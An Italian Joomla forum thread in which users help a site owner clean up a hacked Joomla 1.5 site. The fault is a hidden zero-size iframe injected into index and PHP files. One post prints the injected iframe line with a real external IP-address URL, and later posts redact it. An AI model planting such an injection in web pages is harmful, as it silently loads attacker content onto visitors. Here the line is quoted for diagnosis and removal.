aiuto aiuto

[pariduccio]

appena uscita la relise stabile di joomla 1.5 l'ho installata e ho messu su un bel portalino, tutto bene fin oggi ma questa mattina mi è giunta una chiamata " pariduccio il sito non funziona" .. ora ho realmente controllato e accedendo al sito c'è una pagina bianca con su scritto
Parse error: syntax error, unexpected '<' in .....miosito&root/index.php on line 89


aiuto ragazzi... qualcuno può aiutarmi sapete come risolvere questa strana situazione senza rifare il tutto.. anche perchè c'è su già un forum molto popolato e svariati articoli scritti da persone d'importanza politico-locale... help-me!!!

[pariduccio]

vi prego ragazzi ... il servere mi ha appena detto che da parte loro è tuto ok.. ma che è un errore di sintassi... come lo risolvo??? per favore sono disperato

[sara82]

Ciao pariduccio,

puoi postare un link al tuo sito? Credo che il tuo server abbia ragione, si tratta di un errore di sintassi. Probabilmente è stata modificata la index.php, e si è verificato un errore.
Controlla la pagina alla riga 89.. Sembra che ci sia un < dove non deve esserci..

[pariduccio]

www.caffepolitico.it

[sara82]

Hai controllato la index.php alla riga 89?

[pariduccio]

e chi ne capisce niente....

[pariduccio]

se vuole le copio la rica così mi dice se c'è qualcosa che non va

[sara82]

Posta pure.. 

[pariduccio]

 * RETURN THE RESPONSE

 */

echo JResponse::toString($mainframe->getCfg('gzip'));

<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>



spero almeno di aver beccato la riga giusta!!!! bhe si .. era numerata!

[sara82]

Mmmm.. al di là del problema di sintassi.. non mi convince molto quell' iframe.. non ci dovrebbe stare..  Potrebbe essere indice di un deface.. Dovresti segnalare la cosa al tuo hosting..

Comunque.. puoi allegare l'intero file index.php? (come allegato non all'interno del post  )

[sara82]

Ok la riga 89 è questa: <iframe src="*** removed ***" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Questo iframe non ci deve stare, e secondo me è indice di un deface.. cancellalo e il sito dovrebbe tornare ok..

P.s: a quanto ne so, a chi ha subito deface di questo tipo sul tuo servizio di hosting, sono stati inseriti iframe in tutti i file index e .html.. dovresti controllare anche tutti gli altri file di questo tipo..

[pariduccio]

grazie milleeeeeeeeeee

[pariduccio]

funziona tuttoooooo bellissimo grazie sara83... posso portarti a cena fuori??? grazia joomla.it ... sono contentissimo

[surfbit]

funziona tuttoooooo bellissimo grazie sara83... posso portarti a cena fuori??? grazia joomla.it ... sono contentissimo

mi dispiace ma a cena fuori no   

[sara82]

ottimo! Sono contenta che funzioni! 

Per curiosità.. che versione di Joomla hai? E i componenti sono aggiornati? E' fondamentale tenere sempre i siti aggiornati all'ultima versione stabile disponibile, sia per quanto riguarda il core sia i componenti.. 

[pariduccio]

ho la Versione 1.5.1 e non so se i componenti sono aggiornati. Cmq resta il fatto che sto ripulendo tutti i file chiamati index e che ... riportano puntualmente questa scritta.: <html><body bgcolor="#FFFFFF"></body></html><iframe src=".............."sito strano"" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


volevo giustamente sapere se devo rimuovere solo la tag che riguarda l'iframe ho anche quella piccola tag html body con la definizione del colore di fondo??

[sara82]

Cancella solo l'iframe.. 

[ste]

Ragazzi, potreste rimuovere l'indirizzo presente all'interno dell'iframe nei vostri post? per evitare che qualcuno ci clicchi... Grazie

[sara82]

Ops scusa ste hai ragione..  rimuovo subito.. 

[ste]

Dont' worry

[pariduccio]

credete che esista un programmino che ripulisca il tutto???
in joomla esistono milioni di pagine chiamate index.... e mi sono stancato di cancellare e cancellare.

[Kriss]

Ciao, mi viene in mente che con notepad++ (software free) potresti aprire tutti i file index e usare la funzione sostituisci tutto nei documenti aperti (in trova metti l'iframe completo, in sostiutisci con lasci vuoto)

[e.limone]

Aiuto qualcuno sa come fare a ripristinare la situazione iniale??? Tutti i miei file hanno la stringa iframe...qualcuno mi aiuta?

[sara82]

Se non hai un backup precedente al deface prova a chiedere al tuo servizio di hosting se ne hanno uno loro..

P.s: pariduccio puoi rimuovere anche tu il link all'iframe come ho fatto io? Come osservato giustamente da ste qualcuno potrebbe cliccarci sopra.. 

[e.limone]

Sara,
vorrei farti una serie di domande per comprendere meglio:

Ho una versione di Joomla che dovrebbe essere identica su un altro sito, potrei copiare i file tranne quelli di configurazione?

Posso sostituirli in caso con una versione scaricata e nuova di Joomla?

Il deface potrebbe ricapitare?

Nel PHP admin ho fatto un backup solo dati del db di Joomla se reinstallo tutto e ripristino quei dati torna tutto come prima?

[sara82]

Hai anche tu la versione 1.5? Se si quale versione? Se no che versione hai di Joomla 1.0.x? Perchè se non hai l'ultima stabile dovresti fare anche un upgrade.

Non è necessario sostituire tutti i file e le cartelle di Joomla, ma solo i file modificati dal deface..

*** edit: ho riletto ora il tuo post.. tu dici che tutti i tuoi file contengono l'iframe? ***

Dovresti scaricarti il tuo sito in locale, attraverso un editor ricercare la stringa relativa all'iframe (in modo da avere una lista di tutti i file modificati) e poi o ripulire questi file o sostituirli quelli puliti di un backup precedente.
Credo che il deface abbia riguardato solo questi file index e .html e non il database..

Riguardo alla tua domanda se il deface potrebbe ricapitare non ne ho proprio idea..
Non ho conoscenze nel mondo dei lamer.. 

Scherzi a parte, purtroppo non si può prevedere se e quando si verificheranno questi attacchi, però si può cercare di fare il possibile per prevenirli.. Dal lato dell'hosting mantenendo i server sicuri e aggiornati, dal lato dell'utente utilizzando sempre le ultime versioni stabili disponibili, sia del core, sia dei componenti.. E a proposito di componenti è buona norma controllare sempre la Vulnerable Extensione List di Joomla.org: http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/,
per accertarsi di non stare utilizzando componenti insicuri.. 

[e.limone]

Sara,
ti confermo che i file erano tutti quelli in PHP. La versione è la 1.5 e ho provveduto a fare come hai detto. Sono un utente mac e ho trovato molto comodo fare il "trova sostituisci" con un programma molto rapido e snello che si chiama TextMate (ahimè non gratuito ma utile nella sua versione di prova). I file erano 1.182. Ora sto ripulendo il server e ricaricando la versione pulita: se tutto dovesse andare bene questa diventerà la mia versione "attendibile".

Sul perchè siano avvenute queste modifiche posso solo dirti che lo ignoro in quanto non sono state installate estensioni al di fuori di quelle normalmente distribuite dal pacchetto Joomla. L'utente in questione, infatti, non ha esigenze particolari.
Spero che questa esperienza non si debba ripetere.

[sara82]

La 1.5 quale versione? Mi raccomando aggiorna all'ultima stabile.. 

Quindi non avevi componenti di terze parti?

[pariduccio]

il sito si è ripreso .. ma con un problema .. non mi attacca più nessun templeta a nessuna pagina tranne che all'index... vedete un po www.caffepolitico.it cosa credete che sia successo? avro fatto danni nel ripulire le pagine?? caspita non riesco a uscirne fuori da questa situazione.

[sudoku]

grazie sara83

...capisco che non sia educato chiedere l'età ad una donna ma addirittura cambiargliela credo sia davvero troppo